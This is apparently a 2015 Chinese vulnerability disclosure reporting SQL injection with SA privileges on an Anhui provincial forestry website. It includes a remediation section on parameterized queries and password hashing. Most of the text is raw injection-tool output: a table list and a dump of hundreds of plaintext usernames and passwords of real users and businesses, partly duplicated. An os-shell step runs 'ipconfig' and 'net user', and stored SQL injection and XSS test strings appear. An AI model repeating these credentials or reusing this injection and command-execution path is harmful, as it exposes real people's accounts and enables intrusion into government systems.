2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开
此前还有文件上传漏洞,但是已经修复了。。。
安徽省林业信息网分布于安徽省各个省市,其存在严重SQL注入漏洞,并且是SA权限,可以执行系统命令。大量地市林业数据库信息可能被泄露。
各个地市的数据库:
当前库(表清单中的 D99_CMD、D99_REG、D99_Tmp 通常是自动化注入工具执行命令时遗留的临时表,说明该库此前很可能已被他人利用过,排查时应一并做入侵取证):
Database: netweb_ahly[47 tables]+-----------------------+| D99_CMD || D99_REG || D99_Tmp || Elook_Setup || H_Dict_Data || H_Service_Function || H_Service_Info || H_Service_ItemFile || H_Service_ItemFile || H_Service_ItemType || H_Site_AccessingTotal || H_Site_AccessingTotal || H_Site_Advertising || H_Site_Base || H_Site_Comment || H_Site_Down || H_Site_Function || H_Site_Info || H_Site_LinkAdd || H_Site_LinkType || H_Site_Mail || H_Site_Message || H_Site_ModelInfo || H_Site_ModelRes || H_Site_ModelType || H_Site_Research_Item || H_Site_Research_Item || H_System_Columns || H_System_GroupPurview || H_System_InfoPass || H_System_Orgn || H_System_Purview || H_System_Quanxian || H_System_Tables || H_System_UserGroup || H_System_UserGroup || H_System_WeiWen || H_service_dept || M_Site_Content || M_System_DeriveId || S3_Tmp || SB_Enterprise || SB_Item || SB_shangbao || count_value || dtproperties || t_jiaozhu |+-----------------------+
数据表信息(口令以明文存储;部分 loginName/password 字段中保存着 SQL 注入和 XSS 测试串,说明已有扫描器或他人对该系统做过测试,且输入未经过滤即入库):
Database: netweb_ahlyTable: SB_Enterprise[419 entries]+--------------------------------+----------------------------------------+| loginName | password |+--------------------------------+----------------------------------------+[22:18:13] [WARNING] console output will be trimmed to last 256 rows due to large table size| yxk19591226 | yxk19591226 || jzlywh | yzf1234csx5678 || 天涯海角 | zhm664088 || 周德贵 | zhou7573222 || 270923932 | zhouyichao || keer_zhou8888 | zk800815 || zqf513658 | zqf147258369 || TLSTGSSLGY | zwj123123zwj || QDfEwF_username | ZxMDFw_password || mj_hailou | 000000 || 操乐明 | 000333 || 372564470 | 05585560218 || xnlyuy | 05597518303 || hqy | 100001 || 1111 | 1111 || test | 111111 || 112233 | 112233 || chushujie | 118649 || ZZQ654321 | 119119 || 冯瑞强 | 123456 || ahlygk | 123456@ || 一江小道 | 123456789 || 高明GM | 123456gm || mango | 1234asdf || zhoushihua | 13085602880 || nmssysm | 1314520 || chen1397 | 13979595621 || 石桥步生态特种养殖场 | 173528 || thzj | 19621003 || lgp1972 | 19721017 || gaoshanyangzhi | 19830311 || 13856688439 | 19840705 || 946081787 | 19861210aa || ldyq1314 | 19920223jsawyk || liuchenhui | 199209 || -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 || hz8749007 | 25188 || czslyj | 2812528 || czslyj | 3057987 || bengbu | 3115969 || 水东林业站 | 3260119 || 天上星星 | 328328 || ganzhiquan | 342523 || chly | 369369 || anipyh | 3841347g || 414603191 | 414603191 || fxl.5532308 | 523878 || nyh999 | 551268 || 安徽省雪灵仙药业有限公司 | 5520685 || 746212246 | 5567766300 || jhy580515 | 580501 || tljqlyj733 | 5822733 || wuhu | 5851822 || 我爱家乡 | 585855 || lalyzl | 591015 || xujipu | 6080257 || dfdxah | 641020 || czstcl | 664496 || 2012XQ | 666666 || hnslyj | 6678346 || nishangxiaoyu | 670523 || fnly | 6767300 || XUXUSHENG | 691229 || stevenlun | 7026971 || kuaile | 716894 || yeying | 717825 || xiong68731 | 733733 || wangzicheng | 7696577 || 谢名曙 | 771123 || ZXB66003773 | 777507 || 840805531 | 789246 || HFGD | 795057026 || Cassandra | 7WEe9W6B || ahsbbwdyy | 8021111 || 管店林业总场 | 8041004|| 
linder | 82881225 || huqibo | 8315183 || bmstangyilin | 8461407 || tangjun | 8755192 || oxoxoxoxoxoxox.com | 88888 || 后悔 | 891104 || masys | 9115522wan || liusong | 950404 || tongjun | 961211961211 || bizhiguo | 9701014 || xqmcdsjx | acUn3t1x || admin'='admin'-- - | admin || admin | admin') or 'a'='a'-- || Samir | aeVeINPx || 绿城园林 | aj0540 || gbrkvl | amx21phW || atestu_username | atestu_password || atestu_username' or 'a'='b'-- | atestu_password' or 'a'='b'-- || atestu_username" or "a"="b"-- | atestu_password" or "a"="b"-- || Billybob | b6y8IuX1 || bbszlk | bb1234 || yyu115 | bsf2911253 || gjnunartu | bx0Zge4z || bzlyys | bz342126 || cbh1207 | cbh147258369 || ceshi | ceshi || 525166 | chen || loxqkc | cjf845xk || crystal100 | crystal100 || huadong1977 | czh19771003 || GTYled_username | EdSTzs_password || Latricia | EKFvcFUH || afan | fdxzhj || wndqikw1z | g00dPa$$w0rD || 1 | g00dPassw0rD1 || Welcome | hFBRuOAQ || GqJhKY_username" or "a"="b"-- | hxTsHc_password" or "a"="b"-- || oykthpglucd | IN7Rt5DS || Jalia | iOPfY6gK || Nash | JV8ZXp6E || Dhadhanqirawandt | jVJTvv8x || kjq088 | kjq12310329 || flyoawloykj | L3UAB7Ml || huyaqin19811025 | lgn661208 || liuzhen01215 | LIUzhen01215 || liwei407687678 | liwei7481214 || 李磊 | ll25656022565419ll || rundong | lwd906 || suzhou | lyjcyz || Qzqoch_username | nBLaqV_password || cadmaria | nhfd24155832 || Suzyn | NsKEy1Ax || rvjuKM_username' or 'a'='b'-- | obkPAa_password' or 'a'='b'-- || YvqEPF_username' or 'a'='b'-- | OoewFQ_password' or 'a'='b'-- || pinggu2013 | pinggu2013 || Simone | POTOWOmP || vnRtaT_username | pZCJef_password || xNAKSj_username" or "a"="b"-- | qCKdUD_password" or "a"="b"-- || qinerdong | qinqiong2hannuo || Sxkseq_username" or "a"="b"-- | QsBELf_password" or "a"="b"-- || Avari | qvfP0agu || ahaqzx | qwerty || 153577222162 | r1c551 || BdOguH_username" or "a"="b"-- | RjMSar_password" or "a"="b"-- || gRdtQG_username | ROiWTC_password || root | root || 835839452 | s123456 || Ice | SPDpk0Zn || kwechtomfkv | 
Ss8gOZrw || hOAUPT_username | tDwxcl_password || test | test || Christiana | TO6ckuh0 || tux | tux || gyxsof_username' or 'a'='b'-- | TZLPUJ_password' or 'a'='b'-- || gZbYio_username" or "a"="b"-- | UHCVSQ_password" or "a"="b"-- || Carmelita | uu25B5Zg || xcgWew_username' or 'a'='b'-- | uxQygE_password' or 'a'='b'-- || Marlie | vcJCobJ7 || Abdul | WBz3BSwP || ahhbly | wfxb73 || wfz1978 | wfz610625 || <blank> | wmfkjlbf9 || gcfhbwsm | wsm003426 || wsx1234 | wsx1234 || wumt | wumt022670 || Cfldjc_username' or 'a'='b'-- | xDSUaJ_password' or 'a'='b'-- || <blank> | XSStest" onmouseover=alert(4384)// x=" || xgcaFO_username' or 'a'='b'-- | YCiIVl_password' or 'a'='b'-- || IGescB_username" or "a"="b"-- | YClHoX_password" or "a"="b"-- || Lynn | YCUuLY4n || 宁国奕盛力 | yishengli || yahbbzx | YRV0fnuz || ngyishengli | ysl4675777 || yutian1973 | yutian1973 || yxk19591226 | yxk19591226 || jzlywh | yzf1234csx5678 || 天涯海角 | zhm664088 || 周德贵 | zhou7573222 || 270923932 | zhouyichao || keer_zhou8888 | zk800815 || zqf513658 | zqf147258369 || TLSTGSSLGY | zwj123123zwj || QDfEwF_username | ZxMDFw_password || mj_hailou | 000000 || 操乐明 | 000333 || 372564470 | 05585560218 || xnlyuy | 05597518303 || hqy | 100001 || 1111 | 1111 || test | 111111 || 112233 | 112233 || chushujie | 118649 || ZZQ654321 | 119119 || 冯瑞强 | 123456 || ahlygk | 123456@ || 一江小道 | 123456789 || 高明GM | 123456gm || mango | 1234asdf || zhoushihua | 13085602880 || nmssysm | 1314520 || chen1397 | 13979595621 || 石桥步生态特种养殖场 | 173528 || thzj | 19621003 || lgp1972 | 19721017 || gaoshanyangzhi | 19830311 || 13856688439 | 19840705 || 946081787 | 19861210aa || ldyq1314 | 19920223jsawyk || liuchenhui | 199209 || -999' OR Asc(1)=-1 OR '1'='2 | 2024-12-20 || hz8749007 | 25188 || czslyj | 2812528 || czslyj | 3057987 || bengbu | 3115969 || 水东林业站 | 3260119 || 天上星星 | 328328 || ganzhiquan | 342523 || chly | 369369 || anipyh | 3841347g || 414603191 | 414603191 || fxl.5532308 | 523878 || nyh999 | 551268 || 安徽省雪灵仙药业有限公司 | 5520685 || 746212246 | 
5567766300 || jhy580515 | 580501 || tljqlyj733 | 5822733 || wuhu | 5851822 || 我爱家乡 | 585855 || lalyzl | 591015 || xujipu | 6080257 || dfdxah | 641020 || czstcl | 664496 || 2012XQ | 666666 || hnslyj | 6678346 || nishangxiaoyu | 670523 || fnly | 6767300 || XUXUSHENG | 691229 || stevenlun | 7026971 || kuaile | 716894 || yeying | 717825 || xiong68731 | 733733 || wangzicheng | 7696577 || 谢名曙 | 771123 || ZXB66003773 | 777507 || 840805531 | 789246 || HFGD | 795057026 || Cassandra | 7WEe9W6B || ahsbbwdyy | 8021111 || 管店林业总场 | 8041004|| linder | 82881225 || huqibo | 8315183 || bmstangyilin | 8461407 || tangjun | 8755192 || oxoxoxoxoxoxox.com | 88888 || 后悔 | 891104 || masys | 9115522wan || liusong | 950404 || tongjun | 961211961211 || bizhiguo | 9701014 || xqmcdsjx | acUn3t1x || admin'='admin'-- - | admin |+--------------------------------+----------------------------------------+
--so-shell
ipconfig
net user
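过滤参数的恶意字符;仅靠字符过滤容易被绕过,应改用参数化查询(预编译语句),并将网站的数据库连接账号由 SA 降为仅具备所需权限的普通账号,同时禁用 xp_cmdshell 等可执行系统命令的扩展存储过程。SB_Enterprise 表中的口令为明文,应改为加盐哈希存储,并要求受影响用户重置口令。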
危害等级:中
漏洞Rank:7
确认时间:2015-06-12 09:41
漏洞重复,不再重复处置
暂无